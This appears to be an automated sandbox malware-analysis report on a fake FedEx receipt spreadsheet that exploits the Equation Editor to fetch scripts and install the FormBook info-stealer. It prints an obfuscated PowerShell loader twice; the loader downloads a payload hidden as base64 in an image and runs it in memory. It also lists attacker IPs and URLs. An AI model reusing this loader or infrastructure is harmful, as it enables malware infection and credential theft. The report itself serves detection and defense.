Snort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 41.216.183.13:80 -> 192.168.2.22:49175

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 41.216.183.13 80

Jump to behavior

Contains functionality to download and execute PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 7_2_036407AB URLDownloadToFileW,ShellExecuteW,ExitProcess,

7_2_036407AB

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /88077/BNNJ.txt HTTP/1.1Host: 23.95.235.16Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 194.163.41.117 194.163.41.117
Source: Joe Sandbox View	IP Address: 23.95.235.16 23.95.235.16

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: NEXINTO-DE NEXINTO-DE
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /BrlcB HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ilang.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /88077/ima/ima.imim.im.imim.doC HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /88077/imagesofrosepetelflowerstogetitgreat.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Users_API/syscore/file_m0veebx3.y4i.txt HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 41.216.183.13

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 194.163.41.117:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.163.41.117:443 -> 192.168.2.22:49179 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 7_2_036407AB URLDownloadToFileW,ShellExecuteW,ExitProcess,

7_2_036407AB

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B654C9D0.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /BrlcB HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ilang.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /88077/ima/ima.imim.im.imim.doC HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /88077/imagesofrosepetelflowerstogetitgreat.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Users_API/syscore/file_m0veebx3.y4i.txt HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 41.216.183.13
Source: global traffic	HTTP traffic detected: GET /88077/BNNJ.txt HTTP/1.1Host: 23.95.235.16Connection: Keep-Alive

Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: ilang.in
Source: global traffic	DNS traffic detected: DNS query: uploaddeimagens.com.br

Source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.479671681.0000000006221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16
Source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.479671681.0000000006221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/88077/BNNJ.txt
Source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/88077/BNP
Source: EQNEDT32.EXE, 00000007.00000002.455223892.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/88077/imagesofrosepetelflowerstogetitgreat.gif
Source: EQNEDT32.EXE, 00000007.00000002.455415993.0000000003640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/88077/imagesofrosepetelflowerstogetitgreat.gifj
Source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.95.24
Source: wscript.exe, 00000009.00000002.481524430.0000000000697000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.183.13/Users_API/syscore/file_B
Source: wscript.exe, 00000009.00000002.481524430.0000000000697000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481376582.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481166475.00000000004AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481370525.000000000049F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481299140.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, magesofrosepetelflowerstogetitgrea.vBS.7.dr, imagesofrosepetelflowerstogetitgreat[1].gif.7.dr	String found in binary or memory: http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txt
Source: wscript.exe, 00000009.00000003.480557490.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481408431.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481147687.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481281597.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481123191.00000000004D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txtr
Source: wscript.exe, 00000009.00000003.480862214.00000000004EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.480557490.00000000004EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481272894.00000000004EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481430080.00000000004EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txtz
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: ilang.in.url.4.dr	String found in binary or memory: http://ilang.in/
Source: FedEx Receipt_53065724643.xls, BrlcB.url.4.dr	String found in binary or memory: http://ilang.in/BrlcB
Source: B9930000.0.dr, ~DF189859C23F2234A3.TMP.0.dr	String found in binary or memory: http://ilang.in/BrlcByX
Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 0000000A.00000002.474007800.0000000002611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 0000000A.00000002.474007800.0000000002749000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 0000000A.00000002.474007800.0000000002749000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235
Source: powershell.exe, 0000000A.00000002.474007800.0000000002749000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4;

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD4612E1.doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ima.imim.im.imim[1].doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Excel sheet contains many unusual embedded objects

Source: FedEx Receipt_53065724643.xls	OLE: Microsoft Excel 2007+
Source: FedEx Receipt_53065724643.xls	OLE: Microsoft Excel 2007+
Source: ~DFE1D622D06AD63FEF.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: ~DF5C7C8EE0310B7690.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: B9930000.0.dr	OLE: Microsoft Excel 2007+
Source: B9930000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\BrlcB.url			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ilang.in.url			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\ProgID	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgID	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"			Jump to behavior

Abnormal high CPU Usage

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process Stats: CPU usage > 49%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042B243 NtClose,	12_2_0042B243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023907AC NtCreateMutant,LdrInitializeThunk,	12_2_023907AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FAE8 NtQueryInformationProcess,LdrInitializeThunk,	12_2_0238FAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FB68 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_0238FB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238F9F0 NtClose,LdrInitializeThunk,	12_2_0238F9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FDC0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_0238FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02390078 NtResumeThread,	12_2_02390078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02390060 NtQuerySection,	12_2_02390060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02390048 NtProtectVirtualMemory,	12_2_02390048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023900C4 NtCreateFile,	12_2_023900C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0239010C NtOpenDirectoryObject,	12_2_0239010C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023901D4 NtSetValueKey,	12_2_023901D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02390C40 NtGetContextThread,	12_2_02390C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023910D0 NtOpenProcessToken,	12_2_023910D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02391148 NtOpenThread,	12_2_02391148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FA20 NtQueryInformationFile,	12_2_0238FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FA50 NtEnumerateValueKey,	12_2_0238FA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FAB8 NtQueryValueKey,	12_2_0238FAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FAD0 NtAllocateVirtualMemory,	12_2_0238FAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FB50 NtCreateKey,	12_2_0238FB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FBB8 NtQueryInformationToken,	12_2_0238FBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FBE8 NtQueryVirtualMemory,	12_2_0238FBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238F8CC NtWaitForSingleObject,	12_2_0238F8CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238F938 NtWriteFile,	12_2_0238F938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02391930 NtSetContextThread,	12_2_02391930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238F900 NtReadFile,	12_2_0238F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FE24 NtWriteVirtualMemory,	12_2_0238FE24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FEA0 NtReadVirtualMemory,	12_2_0238FEA0
